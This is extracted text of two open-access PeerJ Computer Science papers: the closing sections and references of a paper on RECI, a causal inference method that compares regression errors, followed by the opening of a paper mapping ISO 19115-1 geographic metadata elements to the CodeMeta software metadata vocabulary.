or PNLs), because they under- or overestimate the noise levels. It may, however, happen that the method even benefits from underfitting: if there is a simple regression model in causal direction that fits the data quite well, but in anticausal relation the conditional expectation becomes more complex, a regression model with underfitting increases the error even more for the anticausal direction than for the causal direction. Algorithm 1 The proposed causal inference algorithm. function RECI(X, Y ) FX and Y are the observed data. (X,Y )←RescaleData(X,Y ) f ←FitModel(X,Y ) FFit regression model f : X →Y g ←FitModel(Y,X) FFit regression model g : Y →X MSEY |X ←MeanSquaredError(f ,X,Y ) MSEX|Y ←MeanSquaredError(g,Y,X) if MSEY |X 9999 LiNGAM 0.1459±0.0053 RECI-LOG 63.16±3.35 RECI-MON 4.65±0.28 RECI-POLY 2.78±0.1 RECI-SVR 87.33±33.43 RECI-NN 46.62±0.28 ranking of ANM, PNL, SLOPE and RECI is not surprising; ANM and PNL need to evaluate the independence between input and residual on top of fitting a model. In case of SLOPE, multiple regression models need to be fitted depending on a certain criterion that requires to be evaluated. Therefore, by construction, RECI can be expected to be faster than ANM, PNL and SLOPE. Discussion Due to the greatly varying behavior and the choice of various optimization parameters, a clear rule of which regression function is the best choice for RECI remains an unclear and difficult problem. Overall, it seems that simple functions are better in capturing the error asymmetries than complex models. However, a clear explanation for this is still lacking. A possible reason for this might be that simple functions in causal direction already achieve Blöbaum et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.169 25/29 https://peerj.com https://doi.org/10.7717/peerjcs.169/fig-8 http://dx.doi.org/10.7717/peerj-cs.169 a small error, while in anticausal direction, more complex models are required to achieve a small error. To justify speculative remarks of this kind raises deep questions about the foundations of causal inference. According to Eq. (1), it is possible to conclude that the joint distribution has a simpler description in causal direction than in anticausal direction. Seeing this, a model selection based on the regression performance and model complexity considered in a dependent manner might further improve RECI’s practical applicability. Regarding the removal of low-density points, the performance of methods that are based on the Gaussiantiy assumption, such as FN and IGCI with Gaussian reference measure, seems not to be influenced by the removal. On the other hand, the performance of HSIC, ENT, and IGCI with uniform measure is negatively affected, while the performance of LiNGAM and RECI increases. In case of RECI, this can be explained by a better estimation of the true MSE with respect to the regression function class. Regarding the computational cost, we want to emphasize again that RECI, depending on the implementation details, can have a significantly lower computational cost than ANM, SLOPE and CURE, while providing comparable or even better results. Further, it can be easily implemented and applied. CONCLUSION We presented an approach for causal inference based on an asymmetry in the prediction error. Under the assumption of an independence among the data generating function, the noise, and the distribution of the cause, we proved (in the limit of small noise) that the conditional variance of predicting the cause by the effect is greater than the conditional variance of predicting the effect by the cause. For instance, in the example shown in Fig. 1, the regression error in the true causal direction is smaller than the error in the anticausal direction. In our work, the additive noise is not assumed to be independent of the cause (in contrast to so-called additive noise models). The stated theorem might also be interesting for other statistical applications. We proposed an easily implementable and applicable algorithm, which we call RECI, that exploits this asymmetry for causal inference. The evaluations show supporting results and leave room for further improvements. By construction, the performance of RECI depends on the regression method. According to our limited experience so far, regression with simple model classes (that tend to underfit the data) performs reasonably well. To clarify whether this happens because the conditional distributions tend to be simpler—in a certain sense—in causal direction than in anticausal direction has to be left for the future. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by JST CREST Grant Number JPMJCR1666 and JSPS KAKENHI Grant Number JP17K00305, Japan. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Blöbaum et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.169 26/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.169 Grant Disclosures The following grant information was disclosed by the authors: ST CREST: JPMJCR1666. JSPS KAKENHI: JP17K00305. Competing Interests The authors declare there are no competing interests. Author Contributions • Patrick Blöbaum conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Dominik Janzing and Takashi Washio conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. • Shohei Shimizu and Bernhard Schölkopf conceived and designed the experiments, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: Real-world data can be found at: https://webdav.tuebingen.mpg.de/cause-effect/ Artificial data can be found at: http://jmlr.org/papers/v17/14-518.html. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.169#supplemental-information. REFERENCES Blöbaum P, Janzing D, Washio T, Shimizu S, Schölkopf B. 2018. Cause-effect inference by comparing regression errors. In: Proceedings of the 21st international conference on artificial intelligence and statistics (AISTATS 2018). Blöbaum P, Shimizu S, Washio T. 2017. A novel principle for causal inference in data with small error variance. In: European symposium on artificial neural networks. Louvain-la-Neuve, Belgium: i6doc, 347–352. Blöbaum P, Washio T, Shimizu S. 2017. Error asymmetry in causal and anticausal regression. Behaviormetrika 44(2):491–512. Comley JW, Dowe DL. 2003. General Bayesian networks and asymmetric languages. In: Proceedings of the second Hawaii international conference on statistics and related fields. Daniušis P, Janzing D, Mooij J, Zscheischler J, Steudel B, Zhang K, Schölkopf B. 2010. Inferring deterministic causal relations. In: Proceedings of the 26th conference on uncertainty in artificial intelligence. Corvallis: AUAI Press, 143–150. Blöbaum et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.169 27/29 https://peerj.com https://webdav.tuebingen.mpg.de/cause-effect/ http://jmlr.org/papers/v17/14-518.html http://dx.doi.org/10.7717/peerj-cs.169#supplemental-information http://dx.doi.org/10.7717/peerj-cs.169#supplemental-information http://dx.doi.org/10.7717/peerj-cs.169 Hoyer P, Janzing D, Mooij J, Peters J, Schölkopf B. 2009. Nonlinear causal discovery with additive noise models. In: Advances in neural information processing systems 21. Red Hook: Curran Associates, Inc., 689–696. Hyvärinen A, Smith S. 2013. Pairwise likelihood ratios for estimation of non-Gaussian structural equation models. Journal of Machine Learning Research 14(Jan):111–152. Janzing D, Mooij J, Zhang K, Lemeire J, Zscheischler J, Daniušis P, Steudel B, Schölkopf B. 2012. Information-geometric approach to inferring causal directions. Artificial Intelligence 182:1–31 DOI 10.1016/j.artint.2012.01.002. Janzing D, Schölkopf B. 2010. Causal inference using the algorithmic Markov condition. IEEE Transactions on Information Theory 56(10):5168–5194 DOI 10.1109/TIT.2010.2060095. Janzing D, Sun X, Schölkopf B. 2009. Distinguishing cause and effect via second order exponential models. eprint http://arxiv.org/abs/0910.5561. Kano Y, Shimizu S. 2003. Causal inference using nonnormality. In: Proceedings of the international symposium on science of modeling, the 30th anniversary of the information criterion. Tokyo, 261–270. Lemeire J, Janzing D. 2012. Replacing causal faithfulness with algorithmic independence of conditionals. Minds and Machines 23(2):227–249 DOI 10.1007/s11023-012-9283-1. Ma S, Statnikov A. 2017. Methods for computational causal discovery in biomedicine. Behaviormetrika 44(1):165–191 DOI 10.1007/s41237-016-0013-5. Marx A, Vreeken J. 2017. Telling cause from effect using MDL-based local and global re- gression. In: 2017 IEEE international conference on data mining (ICDM). Piscataway: IEEE, 307–316 DOI 10.1109/ICDM.2017.40. Mooij J, Peters J, Janzing D, Zscheischler J, Schölkopf B. 2016. Distinguishing cause from effect using observational data: methods and benchmarks. Journal of Machine Learning Research 17(32):1–102. Pearl J. 2009. Causality: models, reasoning and inference. 2nd edition. New York: Cambridge University Press. Peters J, Janzing D, Schölkopf B. 2011. Causal inference on discrete data using additive noise models. IEEE Transactions on Pattern Analysis and Machine Intelligence 33(12):2436–2450 DOI 10.1109/TPAMI.2011.71. Peters J, Janzing D, Schölkopf B. 2017. Elements of causal inference—foundations and learning algorithms. Cambridge: MIT Press. Rissanen J. 1978. Modeling by shortest data description. Automatica 14(5):465 – 471 DOI 10.1016/0005-1098(78)90005-5. Rosner F. 1987. The ethics of randomized clinical trials. The American Journal of Medicine 82(2):283–290 DOI 10.1016/0002-9343(87)90069-6. Schölkopf B, Janzing D, Peters J, Sgouritsa E, Zhang K, Mooij J. 2013. Semi-supervised learning in causal and anticausal settings. In: Schölkopf B, Luo Z, Vovk V, eds. Empirical inference. Festschrift in Honor of Vladimir Vapnik, Berlin, Heidelberg: Springer-Verlag, 129–141 DOI 10.1007/978-3-642-41136-6_13. Blöbaum et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.169 28/29 https://peerj.com http://dx.doi.org/10.1016/j.artint.2012.01.002 http://dx.doi.org/10.1109/TIT.2010.2060095 http://arxiv.org/abs/0910.5561 http://dx.doi.org/10.1007/s11023-012-9283-1 http://dx.doi.org/10.1007/s41237-016-0013-5 http://dx.doi.org/10.1109/ICDM.2017.40 http://dx.doi.org/10.1109/TPAMI.2011.71 http://dx.doi.org/10.1016/0005-1098(78)90005-5 http://dx.doi.org/10.1016/0002-9343(87)90069-6 http://dx.doi.org/10.1007/978-3-642-41136-6_13 http://dx.doi.org/10.7717/peerj-cs.169 Sgouritsa E, Janzing D, Hennig P, Schölkopf B. 2015. Inference of cause and effect with unsupervised inverse regression. In: Artificial intelligence and statistics. San Diego: PMLR, 847–855. Shimizu S, Hoyer P, Hyvärinen A, Kerminen A. 2006. A linear non-Gaussian acyclic model for causal discovery. Journal of Machine Learning Research 7:2003–2030. Spirtes P, Glymour C, Scheines R. 2000. Causation, prediction, and search. Cambridge: MIT press. Statnikov A, Henaff M, Lytkin NI, Aliferis CF. 2012. New methods for separating causes from effects in genomics data. BMC Genomics 13(8):S22 DOI 10.1186/1471-2164-13-S8-S22. Sun X, Janzing D, Schölkopf B. 2006. Causal inference by choosing graphs with most plausible Markov kernels. In: Proceedings of the 9th international symposium on artificial intelligence and mathematics. Fort Lauderdale, FL, 1–11. Zhang K, Hyvärinen A. 2009. On the identifiability of the post-nonlinear causal model. In: Proceedings of the 25th conference on uncertainty in artificial intelligence. Arlington: AUAI Press, 647–655. Blöbaum et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.169 29/29 https://peerj.com http://dx.doi.org/10.1186/1471-2164-13-S8-S22 http://dx.doi.org/10.7717/peerj-cs.169 work_3lprnbk47berhkkk2gnttcvhuu ---- Submitted 28 August 2018 Accepted 11 January 2019 Published 4 February 2019 Corresponding author Ted Habermann, ted.habermann@gmail.com Academic editor Silvio Peroni Additional Information and Declarations can be found on page 19 DOI 10.7717/peerj-cs.174 Copyright 2019 Habermann Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Mapping ISO 19115-1 geographic metadata standards to CodeMeta Ted Habermann The HDF Group, Champaign, IL, United States of America ABSTRACT The CodeMeta Project recently proposed a vocabulary for software metadata. ISO Technical Committee 211 has published a set of metadata standards for geographic data and many kinds of related resources, including software. In order for ISO metadata creators and users to take advantage of the CodeMeta recommendations, a mapping from ISO elements to the CodeMeta vocabulary must exist. This mapping is complicated by differences in the approaches used by ISO and CodeMeta, primarily a difference between hard and soft typing of metadata elements. These differences are described in detail and a mapping is proposed that includes sixty-four of the sixty-eight CodeMeta V2 terms. The CodeMeta terms have also been mapped to dialects used by twenty-one software repositories, registries and archives. The average number of terms mapped in these cases is 11.2. The disparity between these numbers reflects the fact that many of the dialects that have been mapped to CodeMeta are focused on citation or dependency identification and management while ISO and CodeMeta share additional targets that include access, use, and understanding. Addressing this broader set of use cases requires more metadata elements. Subjects Digital Libraries, Software Engineering Keywords Software citation, CodeMeta, ISO metadata, Metadata, Crosswalk INTRODUCTION The CodeMeta Project (CodeMeta Project, 2018) recently proposed (1) a vocabulary for documenting software, (2) mappings between metadata fields used by a broad range of software repositories, registries and archives (CodeMeta Crosswalk, 2018), and (3) developed software with the purpose of facilitating automatic translation between different representations of software metadata. The vocabulary was designed to support several different software use cases, including citation, discovery, use and, to some degree, understanding. The ISO Technical Committee 211 has developed generic metadata standards that are widely used for geographic data of many kinds. These standards were also designed as a foundation that can be built on to document many kinds of things and support many use cases (Habermann, 2018a; Habermann, 2018b; Habermann, 2018c). This paper describes a mapping between the conceptual model that underlies ISO metadata (ISO 19115-1, 2014) and CodeMeta with the goal of facilitating the creation of CodeMeta-compliant descriptions of software that is documented using the ISO standards. The communities that developed these two metadata dialects share the important goal How to cite this article Habermann T. 2019. Mapping ISO 19115-1 geographic metadata standards to CodeMeta. PeerJ Comput. Sci. 5:e174 http://doi.org/10.7717/peerj-cs.174 https://peerj.com mailto:ted.habermann@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.174 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.174 of comprehensive standards that address multiple use cases for many disciplines. Both groups pursue this goal by developing consensus, but the details of the processes used to develop their standards differ. ISO TC211 represents a traditional International standards body with well-defined processes, publication methods and a business model that includes costs to users for standards documents. CodeMeta represents a community of volunteer practitioners with an initial set of proposed conventions open on the Web and an invitation for adoption, experimentation and evolution. In addition to these process differences, there are also differences between the structures and implementations of these two models. These are described below with the mappings following. Dialect coverage and scope Mapping metadata for software between different schemas and dialects is an important technical goal of CodeMeta. This goal is supported using a crosswalk file that is maintained and contributed to in the CodeMeta Git repository (CodeMeta Crosswalk, 2018). This file lists the CodeMeta terms along with equivalents in twenty-one dialects. This crosswalk is the basis for translating content between these dialects. A similar situation occurs in many in science communities that are trying to support multiple use cases, i.e., document, share, and trust, for datasets using multiple metadata dialects (see Gordon & Habermann, 2018). The concept of ‘‘Dialect Coverage’’ has come up in those studies as the amount (%) of the concepts in a particular recommendation that a dialect includes. In the CodeMeta case, this is the number of CodeMeta concepts that can be represented in the dialects listed in the crosswalk file (Crosswalk Data, 2018). Figure 1 shows this count for each of the twenty-one dialects. These counts were determined from the crosswalk file by counting the number of cells with content in each column using a spreadsheet count() function. Both versions of CodeMeta and ISO 19115-1 (2016) are included in this figure as well. The data show that the ISO dialect covers very close to all (64/68) of the CodeMeta concepts and the other twenty-one dialects cover an average of 11.23/68, suggesting that CodeMeta is more similar to ISO than it is to other dialects that have done crosswalks. The difference between the ISO mapping and others is striking. It likely reflects the difference between the small number of metadata elements used for discovering and citing software (or data) and the larger number needed to be able to use it and trust it. In the current software citation landscape, this is the difference between the complete CodeMeta vocabulary, i.e., all metadata for code (over sixty items), and the FORCE11 Software Citation Guidelines, i.e., metadata for code citation (Smith, Katz & Niemeyer, 2016) which includes only ten items. In some cases, multiple CodeMeta terms are mapped to the same ISO elements. Most of this ambiguity is related to differences in the two models and approaches that are discussed in detail below. ISO elements that are mapped to more than one CodeMeta term are identified with * in the crosswalk tables below. Model characteristics The ISO metadata standards are based on a UML model that is harmonized across all standards developed and managed by the committee. The model is built around classes Habermann (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.174 2/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.174 Figure 1 Coverage of CodeMeta concepts in multiple dialects. The average number of CodeMeta con- cepts covered by twenty-one dialects is 11.2. The ISO dialect covers sixty-four of sixty-eight CodeMeta concepts. Full-size DOI: 10.7717/peerjcs.174/fig-1 and attributes that describe the structure of the standards and the relationships among objects. ISO 19115-1 (2014) includes thirteen top-level classes that provide details on identification, content, constraints, distribution, quality, usage, reference systems, spatial representation and several other areas. The ISO standard includes a scope element at the root of each record that gives the type of resource described by the metadata. The default scope is dataset, but other options include: aggregate, application, attribute, attributeType, collection, collectionHardware, collectionSession, coverage, dimensionGroup, document, feature, featureType, fieldSession, initiative, metadata, model, nonGeographicDataset, otherAggregate, platformSeries, product, productionSeries, propertyType, repository, sample, sensor, sensorSeries, series, service, software, tile, transferAggregate (see Habermann, 2018a; Habermann, 2018b; Habermann, 2018c). Mapping the CodeMeta vocabulary to the ISO standard is an initial step toward defining the content that could be included in ISO metadata records that describe software and applications, i.e., those where the scope is software. The most commonly used representation of the ISO standards is XML (ISO 19115-1, 2016). ISO XPaths uniquely identify metadata content and follow the structure of the UML model, with levels in the XML alternating between objects (with types) and properties. This results in XML that is ‘‘striped’’ like the XML representation of the Resource Description Framework (RDF, 2018) (W3C, 2014), i.e., role/type/role/type/content. Types generally start with two uppercase letters (MD, CI, ...) that indicate the UML package that they are Habermann (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.174 3/21 https://peerj.com https://doi.org/10.7717/peerjcs.174/fig-1 http://dx.doi.org/10.7717/peerj-cs.174 defined in (metadata, citation, ...) followed by an underscore (MD_, CI_, ...). Properties (termed roles in this discussion) are in lower camel case. A significant benefit of the striped XML is that properties can be defined with abstract objects that can share properties while being instantiated with different types. For example, the ISO CI_Party object is abstract and includes name and contactInfo properties. It is extended and specialized by CI_Individual and CI_ Organisation objects which inherit name and contactInfo properties and add properties that are relevant for people and organizations, e.g., organizations can include individuals, logos, and position names. This approach also facilitates reuse by allowing standard objects (e.g., people, organizations, or citations) to be referenced using links rather than repetitive content (https://geo-ide.noaa.gov/wiki/index.php?title=ISO_Components). Another benefit of this approach in ISO is the same as that in the schema.org case— communities can extend object definitions when necessary and, in the ISO case, the resulting extended objects fit naturally into the ISO XML representation. This approach is similar to the schema extension model used in CodeMeta to add properties deemed important by the CodeMeta community to the more general SoftwareSourceCode schema that is also a specialization of the schema.CreativeWork schema. The namespace for each element in the XML is identified using a standard namespace prefix (mdb, cit, ...). Asterisks are used in the XPaths to indicate locations where several objects can be used. For example, mdb:identificationInfo/*/ indicates that either mdb:MD_ DataIdentification or srv:SV_ServiceIdentification objects can occur in that location. A simplified notation is introduced for paths through the UML conceptual model in this document that includes only the role names and no information that is specific to the XML representation. For example, the XPath /mdb:MD_Metadata/mdb:identificationInfo/ mri:MD_DataIdentification/mri:resourceSpecificUsage/mri:MD_Usage/mri:identifiedIssues/ cit:CI_ Citation/cit:onlineResource/cit:CI_OnlineResource/cit:linkage is replaced by the conceptpath:identificationInfo.resourceSpecificUsage.identifiedIssues.onlineResource.linkage. These simplified ‘‘concept paths’’ improve readability and emphasize equivalences between CodeMeta and ISO in the conceptual space. Specific XPaths can be constructed from these concept paths when necessary to implement translation of existing ISO content to CodeMeta representations. The reverse translation is not unique. CodeMeta specifies a vocabulary rather than a structural model. It includes properties from several schema.org schemas listed in Table 1 along with the number of items from each schema (Crosswalk Data, 2018). These schemas exist in a schema.org hierarchy which is similar in many ways to the ISO structure. SoftwareApplication and SoftwareSourceCode schemas are both specializations of the Thing >CreativeWork schema. CodeMeta extends these schemas (in CodeMeta.SoftwareSourceCode) with several properties that lack clear equivalents in schema.org. Hard types and soft types All standards and vocabularies need to make choices between hard or soft typing of objects they are describing. Hard typing requires specific names for items and is the only choice available in implementations where names alone can be used to distinguish Habermann (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.174 4/21 https://peerj.com https://geo-ide.noaa.gov/wiki/index.php?title=ISO_Components http://dx.doi.org/10.7717/peerj-cs.174 Table 1 Schema.org schemas and item counts for CodeMeta vocabulary. Source #Terms Source #Terms schema:CreativeWork 24 schema:Thing 6 schema:SoftwareApplication 15 schema:SoftwareSourceCode 4 CodeMeta:SoftwareSourceCode 10 schema (not mapped) 2 schema:Person 7 between items, e.g., CodeMeta. For example, if publication and revision dates are required for complete descriptions of a resource, hard typed representations would include two items: e.g., publicationDate and revisionDate. Soft Typing can be used in dialects which support item attributes as well as values, e.g., XML. In that case, these two dates would be represented with the same name (XML element) and distinguished by a type attribute: and . The difference between these two approaches emerges as the dialects evolve. Hard types evolve by adding new elements to the underlying model, e.g., adding creationDate (or some other type of date) when it becomes apparent that it is needed, and unambiguous definitions of those elements. Soft types evolve by adding items to the shared vocabulary of date types, typically a codelist or thesaurus. The critical difference between hard and soft types boils down to differences in governance models and change tolerance. In communities that use hard types, members must be tolerant to changes in the models and, typically, changes in tooling built on them. Communities that use soft typing must have mechanisms for sharing and evolving vocabularies, typically control bodies or rules. The ISO model is soft-typed and the CodeMeta model is hard-typed. Table 2 lists some of the documentation concepts that illustrate the contrast between these approaches. The first row shows the differences in how dates are treated. The CodeMeta vocabulary includes four types of dates listed in the second column of Table 2. If other date types are required to describe software, maybe dateDeprecated for example, new terms would be found in schema.org or added to the vocabulary to address those needs. The ISO approach involves a single date concept and a codelist that includes sixteen options, shown in the third column of Table 2. That codelist is designed to be extended by communities with other needs without impacting the structure of the standard. In this example, the date type codelist already includes the term ‘‘deprecated’’. Citations Connecting users to resources is one of the most important roles of metadata. It is also one of the most ubiquitous. Several classes of citations are important. Citation to the resource being described in the metadata (Resource Citation). The role of these citations is to provide guidance on how the resource being described should be cited and there is only one of these in each metadata record. Citations to related resources (Related Resource Citation). These are generic references to some other resource and generally include information about the relationship between the resource being described and the related resource. See, for example, the RelatedIdentifier element in the DataCite metadata schema (DataCite Habermann (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.174 5/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.174 Table 2 CodeMeta hard types and related ISO codelists. Item CodeMeta items ISO 19115-1 codelist valuesa Dates embargoDate dateCreated dateModified datePublished CI_DateTypeCode: creation publication revision expiry lastUpdate lastRevision nextUpdate unavailable inForce adopted deprecated superseded validityBegins validityExpires released distribution People and organizations author contributor creator copyrightHolder editor funder producer provider publisher sponsor affiliation CI_RoleCode: resourceProvider custodian owner user distributor originator pointOfContact principalInvestigator processor publisher author sponsor coAuthor collaborator editor mediator rightsHolder contributor funder stakeholder maintainer Online resource types buildInstructions contIntegration issueTracker readme id identifier downloadUrl installUrl codeRepository relatedLink sameAs url CI_OnLineFunctionCode: download information offlineAccess order search completeMetadata browseGraphic upload emailService browsing fileAccess Associations supportingData DS_AssociationTypeCode: crossReference largerWorkCitation partOfSeamlessDatabase stereoMate isComposedOf collectiveTitle series dependency revisionOf Keyword Keywords programmingLanguage applicationCategory applicationSubCategory MD_KeywordTypeCode: discipline place stratum temporal theme dataCentre featureType instrument platform process project service product subTopicCategory taxon Notes. aISO 19115-1 Codelists from https://standards.iso.org/iso/19115/resources/Codelists/cat/codelists.html . Metadata Working Group, 2017) which includes relatedIdentifierType and relationType attributes as additional information. Citations to other, typically specific, resources (Specific Resource Citations). For example, the ISO object that describes data processing includes a citation in the role of softwareReference that specifically provides a reference to software used in the processing. Other examples of these citation types are included in the following discussion. ISO citations ISO 19115-1 includes all three types of citations: • The Resource Citation is unique and occurs at a specific location in the conceptual model: identificationInfo.citation (XPath = /mdb:MD_Metadata/mdb:identification Info/*/mri:citation/cit:CI_Citation). • Related Resource Citations also occur at a specific location in the model, identifica- tionInfo.associatedResource (XPath = /mdb:MD_Metadata/mdb:identificationInfo/*/ mri:associatedResource/mri:MD_AssociatedResource/mri:name/cit:CI_Citation along with two codelists (associationType and initiativeType) that provide information about how the resource is associated.). • Specific Resource Citations occur in a number of locations in the ISO model as part of specific classes. For example, citations to additional documentation occur at identificationInfo.additionalDocumentation and citations to quality reports occur at dataQualityInfo.standaloneQualityReport. All ISO Citations include elements of traditional citations to books or papers e.g., title, authors (people or organizations in many roles), dates (many types), series information, Habermann (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.174 6/21 https://peerj.com https://standards.iso.org/iso/19115/resources/Codelists/cat/codelists.html http://dx.doi.org/10.7717/peerj-cs.174 Table 3 Relative xPaths to titles, identifiers, and URLs in ISO citations. Item xPath from CI_Citation Title cit:CI_Citation/cit:title/gco:CharacterString (concept= title) Identifier cit:CI_Citation/cit:identifier/mcc:MD_Identifier/mcc:code/gco:CharacterString (concept = identifier.code) URL cit:CI_Citation/cit:onlineResource/cit:CI_OnlineResource/cit:linkage/gco:CharacterString (concept=onlineResource.linkage) page numbers, etc., as well as identifiers (ISSN, ISBN, and other types) and URLs with titles, descriptions and types. The XPaths to these items from each ISO citation root are shown in Table 3. CodeMeta citations CodeMeta includes twenty-six terms that represent resources that are related to or support the use of the software being described. These terms have several different types (Text, URL, Text or URL, CreativeWork, CreativeWork or URL, Computer Language or text, ...). In the mappings below, these terms are mapped to the ISO citations. The specific types can be described by adding the paths in Table 3 to the concept or XPaths. Distribution Many of the distribution systems for geographic data described by ISO metadata include repositories (generally called archives or data centers) that manage and preserve data while providing on-going support for users. ISO metadata standards accommodate approaches to resource distribution with or without descriptions of repositories (termed distributors) and each repository can provide several URLs (transferOptions) for each resource. These onlineResources can have any of the functions included in the CI_OnLineFunctionCode codelist in Table 2. The most common online functions are download and information and these are used in the mappings to indicate direct access to the resource (function =download) or information about the resource (function =information). Additional documentation The CodeMeta vocabulary includes many items that are intended to help users use and understand the software described in the metadata. In the ISO standards, these items can be described in two ways: as associated resources (identificationInfo.associatedResource) or as additional documentation (identificationInfo.additionalDocumentation). I have chosen the later in these cases. In dialects without specific citations, e.g., Datacite, these would be referred to as relatedIdentifiers with appropriate relationTypes as the DataCite dialect is soft typed (DataCite Metadata Working Group, 2017). One important goal of CodeMeta is to enable authors to cite software that is used to store, process, analyze, and visualize the data and model results that they use in their work. Increasing citations from the scientific literature is large part of this goal, but there are also significant opportunities to improve the completeness of dataset metadata by citing software. This is generally done as part of the provenance or lineage section of the metadata. The ISO standards provide several specific resource citations for citing software, including: Habermann (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.174 7/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.174 • resourceLineage.processStep.processingInformation.algorithm.citation, • resourceLineage.processStep.processingInformation.softwareReference, and • resourceLineage.processStep.processingInformation.documentation. Mappings The mappings between CodeMeta and ISO are presented here in a series of tables that correspond to the source schema.org schemas used in order to provide some structure that may help clarify the relationships and improve understanding. The process of creating the mappings involved three steps: (1) obvious connections, i.e., description ->identificationInfo.abstract, or name ->identificationInfo.citation.title, (2) more complicated connections like those discussed above, and (3) matching intended types as closely as possible, i.e., CodeMeta terms that were intended to be identifiers were mapped to ISO identifier codes (identifier ->identificationInfo.citation.identifier.code) and those that were intended to be URLs were mapped to ISO linkages (downloadUrl ->distributionInfo.transferOptions.onLine[function =’download’].linkage). This process is, of course, more subjective than objective, and the resulting mappings reflect experience authoring the ISO standards and working with them in multiple contexts over the last decade. The mappings include the property names, types, and descriptions from the CodeMeta vocabulary, conceptual paths for the ISO items (ISO 19115-1, 2014), and XPaths from the standard XML representation (ISO 19115-1, 2016). The conceptual paths are provided here in lieu of the ISO definitions for simplicity. The complete ISO conceptual model with definitions is available in an HTML view (ISO Conceptual Model, 2018). In some cases, multiple CodeMeta terms are mapped to single ISO elements, as described in the Additional Documentation section above. These cases are marked with * in the tables. These mappings are also available in machine-readable forms (Habermann, 2018b; Habermann, 2018c). Schema:Person The schema.Person schema provides a vocabulary for properties of people. In the ISO standards, people and organizations are both referred to as parties and names can be given as any combination of individual names, organization names, or positions. This mapping includes seven items listed in Table 4. Schema:Thing The schema.Thing schema provides a vocabulary for properties of the most generic type of item. In the context of CodeMeta, this item is the resource described by the metadata which is software. In ISO 19115-1 (2014), properties related to the identification of the resource being described are in the identificationInfo section and many of the properties are included in the citation to that resource. As described above, these properties (title, identifier, and link) are included in all citations in the ISO model. This mapping includes six items listed in Table 5. Habermann (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.174 8/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.174 Table 4 Mapping of CodeMeta terms from the schema.Person schema to ISO 19115-1 and ISO 19115-3. Property Type Description ISO 19115-1 ISO 19115-3 address PostalAddress or Text Physical address of the item. party.contactInfo.address. deliveryPoint cit:party/cit:CI_Organisation/ cit:contactInfo/cit:CI_Contact/ cit:address/cit:CI_Address/cit: deliveryPoint/gco:CharacterString affiliation Text An organization that this person is affiliated with. For example, a school/university party.namea cit:party/cit:CI_Organisation/ cit:name/gco:CharacterString email Text Email address party.contactInfo.address. electronicMailAddress cit:party/cit:CI_Organisation/ cit:contactInfo/cit:CI_Contact/ cit:address/cit:CI_Address/ cit:electronicMailAddress/ gco:CharacterString familyName Text Family name. In the US the last name of an Person. This can be used along with givenName in- stead of the name property. party.namea cit:party/cit:CI_Individual/ cit:name/gco:CharacterString givenName Text Given name. In the US the first name of a Person. This can be used along with familyName in- stead of the name property party.namea cit:party/cit:CI_Individual/ cit:name/gco:CharacterString identifier URL URL identifer, ideally an ORCID ID for individuals, a FundRef ID for funders party.partyIdentifier.code cit:party/cit:CI_Organisation/ cit:partyIdentifier/mcc: MD_Identifier/mcc:code/ gco:CharacterString name Text The name of an Organization, or if separate given and family names cannot be resolved, for a Person party.namea cit:party/cit:CI_Organisation/ cit:name/gco:CharacterString Notes. aMultiple CodeMeta terms are mapped to this ISO XML element, some with different attributes. Schema:Thing.CreativeWork The Thing.CreativeWork schema provides a vocabulary for the most generic kind of creative work, including books, movies, photographs, software programs, etc. This mapping includes twenty-four items listed in Table 6. Schema:Thing.CreativeWork.SoftwareSourceCode The Thing.CreativeWork.SoftwareSourceCode schema provides a vocabulary for describing computer programming source code. This mapping includes four items listed in Table 7. CodeMeta:SoftwareSourceCode TheCodeMeta:SoftwareSourceCodeschemaextendsThing.CreativeWork.SoftwareSourceCode with terms created by the CodeMeta Project. This mapping includes ten items listed in Table 8. Habermann (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.174 9/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.174 Table 5 Mapping of CodeMeta terms from the schema.Thing schema to ISO 19115-1 and ISO 19115-3. Property Type Description ISO 19115-1 ISO 19115-3 Description Text A description of the item. identificationInfo.abstract /mdb:MD_Metadata/mdb:identificationInfo/*/mri:abstract/gco:CharacterString identifier PropertyValue or URL The identifier property represents any kind of identifier for any kind of Thing, such as ISBNs, GTIN codes, UUIDs etc. Schema.org provides dedicated properties for representing many of these, either as textual strings or as URL (URI) links. See background notes for more details. identificationInfo.citation.identifier.code /mdb:MD_Metadata/mdb:identificationInfo/*/mri:citation/cit:CI_Citation/cit:identifier/ mcc:MD_Identifier/mcc:code name Text The name of the item (software, Organiza- tion) identificationInfo.citation.title /mdb:MD_Metadata/mdb:identificationInfo/*/mri:citation/cit:CI_Citation/cit:title/ gco:CharacterString relatedLink URL A link related to this object, e.g., related web pages 